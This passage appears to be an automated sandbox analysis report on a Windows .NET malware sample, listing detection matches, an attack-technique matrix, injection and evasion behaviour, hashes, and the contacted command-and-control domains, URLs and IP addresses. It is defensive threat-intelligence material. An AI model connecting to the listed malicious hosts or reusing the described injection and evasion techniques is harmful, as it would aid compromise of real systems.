            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Shared Modules
            Path Interception612
            Process Injection
            1
            Masquerading
            OS Credential Dumping221
            Security Software Discovery
            Remote Services11
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools
            LSASS Memory2
            Process Discovery
            Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager31
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
            Process Injection
            NTDS1
            Remote System Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer13
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information
            LSA Secrets112
            System Information Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common3
            Obfuscated Files or Information
            Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items21
            Software Packing
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            File Deletion
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562118 Sample: tlBHrCrteFXy8Jz.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 31 www.madeitinhome.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 8 other signatures 2->45 11 tlBHrCrteFXy8Jz.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\tlBHrCrteFXy8Jz.exe.log, ASCII 11->29 dropped 57 Tries to detect virtualization through RDTSC time measurements 11->57 59 Injects a PE file into a foreign processes 11->59 15 tlBHrCrteFXy8Jz.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.thietkenoithatvanphong.asia 222.255.46.12, 49821, 80 VNPT-AS-VNVNPTCorpVN Viet Nam 18->33 35 desertbirdmercantile.com 162.241.24.116, 49805, 80 UNIFIEDLAYER-AS-1US United States 18->35 37 4 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 explorer.exe 18->22         started        signatures11 process12 signatures13 49 Self deletion via cmd delete 22->49 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            tlBHrCrteFXy8Jz.exe100%Joe Sandbox ML
            No Antivirus matches
            SourceDetectionScannerLabelLinkDownload
            11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            16.0.explorer.exe.b10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            16.2.explorer.exe.b10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            11.2.tlBHrCrteFXy8Jz.exe.3380000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.yzztx.com/b3xd/?qPYT=aV9tZ&iRah=u1+lAjLBA2+kcdvhq4UZu/nPbWuE94hnVKEDKIE9CxGJPgk2ISTbeIcckL5CyvhDdyZbFg7D5w==0%Avira URL Cloudsafe
            http://blog.iandreev.com/0%Avira URL Cloudsafe
            http://www.sigmamu.com/b3xd/?iRah=5GWj3iokSHma3YiDoT3m16TCcfPCT77oIBdOELLk89ETJqvKsRjgRlGfGSz2uWFXBl65BQRHGg==&qPYT=aV9tZ0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            www.meizi.ltd/b3xd/100%Avira URL Cloudmalware
            http://blog.iandreev.com0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.fontbureau.comoX0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.desertbirdmercantile.com/b3xd/?qPYT=aV9tZ&iRah=Ie1PhgByqbmAnBTD/2NTTWN841CMZzf2VbgiXa4AsIuYcZI/bp6cv0uoISKMiipyVSmV9CFFiA==0%Avira URL Cloudsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.thietkenoithatvanphong.asia/b3xd/?iRah=JdJx4d7W9+IGJje0hU/QcPoKaGdRUKvyvIN3jQdk7kxI7FpVQbo1IF0KYDc1cvBgS1iZcvDTaA==&qPYT=aV9tZ0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.thietkenoithatvanphong.asia
            222.255.46.12
            truetrue
              unknown
              www.madeitinhome.com
              23.230.105.134
              truefalse
                unknown
                sigmamu.com
                160.153.136.3
                truetrue
                  unknown
                  www.yzztx.com
                  154.214.67.82
                  truetrue
                    unknown
                    desertbirdmercantile.com
                    162.241.24.116
                    truetrue
                      unknown
                      www.desertbirdmercantile.com
                      unknown
                      unknowntrue
                        unknown
                        www.sigmamu.com
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://www.yzztx.com/b3xd/?qPYT=aV9tZ&iRah=u1+lAjLBA2+kcdvhq4UZu/nPbWuE94hnVKEDKIE9CxGJPgk2ISTbeIcckL5CyvhDdyZbFg7D5w==true
                          • Avira URL Cloud: safe
                          unknown
                          http://www.sigmamu.com/b3xd/?iRah=5GWj3iokSHma3YiDoT3m16TCcfPCT77oIBdOELLk89ETJqvKsRjgRlGfGSz2uWFXBl65BQRHGg==&qPYT=aV9tZtrue
                          • Avira URL Cloud: safe
                          unknown
                          www.meizi.ltd/b3xd/true
                          • Avira URL Cloud: malware
                          low
                          http://www.desertbirdmercantile.com/b3xd/?qPYT=aV9tZ&iRah=Ie1PhgByqbmAnBTD/2NTTWN841CMZzf2VbgiXa4AsIuYcZI/bp6cv0uoISKMiipyVSmV9CFFiA==true
                          • Avira URL Cloud: safe
                          unknown
                          http://www.thietkenoithatvanphong.asia/b3xd/?iRah=JdJx4d7W9+IGJje0hU/QcPoKaGdRUKvyvIN3jQdk7kxI7FpVQbo1IF0KYDc1cvBgS1iZcvDTaA==&qPYT=aV9tZtrue
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000D.00000000.404330090.0000000006870000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.347608168.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.317325369.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.331095005.0000000006840000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            http://www.apache.org/licenses/LICENSE-2.0tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.comtlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designersGtlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://blog.iandreev.com/tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.com/designers/?tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/bThetlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers?tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://blog.iandreev.comtlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.tiro.comtlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designerstlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.goodfont.co.krtlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.comoXtlBHrCrteFXy8Jz.exe, 00000000.00000002.302412697.0000000001977000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.carterandcone.comltlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sajatypeworks.comtlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.typography.netDtlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNtlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cn/cThetlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmtlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://fontfabrik.comtlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cntlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmltlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.jiyu-kobo.co.jp/tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/DPleasetlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers8tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fonts.comtlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.sandoll.co.krtlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.urwpp.deDPleasetlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.zhongyicts.com.cntlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.sakkal.comtlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                222.255.46.12
                                                www.thietkenoithatvanphong.asiaViet Nam
                                                45899VNPT-AS-VNVNPTCorpVNtrue
                                                162.241.24.116
                                                desertbirdmercantile.comUnited States
                                                46606UNIFIEDLAYER-AS-1UStrue
                                                160.153.136.3
                                                sigmamu.comUnited States
                                                21501GODADDY-AMSDEtrue
                                                154.214.67.82
                                                www.yzztx.comSeychelles
                                                134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:562118
                                                Start date:28.01.2022
                                                Start time:14:00:35
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 10m 13s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:tlBHrCrteFXy8Jz.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:28
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@7/1@6/4
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 25.8% (good quality ratio 22.5%)
                                                • Quality average: 68.4%
                                                • Quality standard deviation: 34%
                                                HCA Information:
                                                • Successful, ratio: 95%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200
                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, dual-a-0001.dc-msedge.net, client.wns.windows.com, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • VT rate limit hit for: tlBHrCrteFXy8Jz.exe
                                                TimeTypeDescription
                                                14:01:54API Interceptor1x Sleep call for process: tlBHrCrteFXy8Jz.exe modified
                                                No context
                                                No context
                                                No context
                                                No context
                                                No context
                                                Process:C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.355304211458859
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):6.390802601979872
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:tlBHrCrteFXy8Jz.exe
                                                File size:793600
                                                MD5:0e9943c0e2afaf5e9acec16ce184b444
                                                SHA1:dc1c5f809a3e6e9a3358878d455cb235d2245460
                                                SHA256:dc368951f1df68a92c51f9afe6ad73c717b040fb9af6a278e9201b176362ed70
                                                SHA512:a7a7e54dc8a144266447b8c500a02adb2dcd855224f8780c6fbfe573ca3eedd1e78ab998aaa4adcfb1f717d670159b93d13cb340e2601fc936d0cc417b78eb50
                                                SSDEEP:6144:ORyHxmRYjO+Q45IX8LhyTa0oEpQOxRv9mu6hLlGATgBEWbs5gm0q2MKI9vTeiNzD:qY6to9OxRlmu6hpnTeVuf2Mfdun7
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J..a............................>,... ...@....@.. ....................................@................................
                                                Icon Hash:00828e8e8686b000
                                                Entrypoint:0x4c2c3e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x61F3C14A [Fri Jan 28 10:11:22 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:v4.0.30319
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
